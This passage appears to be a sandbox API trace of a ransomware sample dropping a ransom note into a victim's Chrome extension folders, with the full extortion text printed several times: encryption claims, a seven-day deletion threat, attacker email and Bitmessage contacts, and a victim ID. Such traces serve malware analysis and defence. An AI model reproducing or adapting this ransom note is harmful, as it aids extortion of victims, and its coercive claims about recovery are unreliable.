\\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.737] WriteFile (in: hFile=0x2ec, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.738] CloseHandle (hObject=0x2ec) returned 1 [0284.738] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\#readme_eman#.rtf")) returned 0xffffffff [0284.738] GetLastError () returned 0x2 [0284.738] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.740] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.740] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.740] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 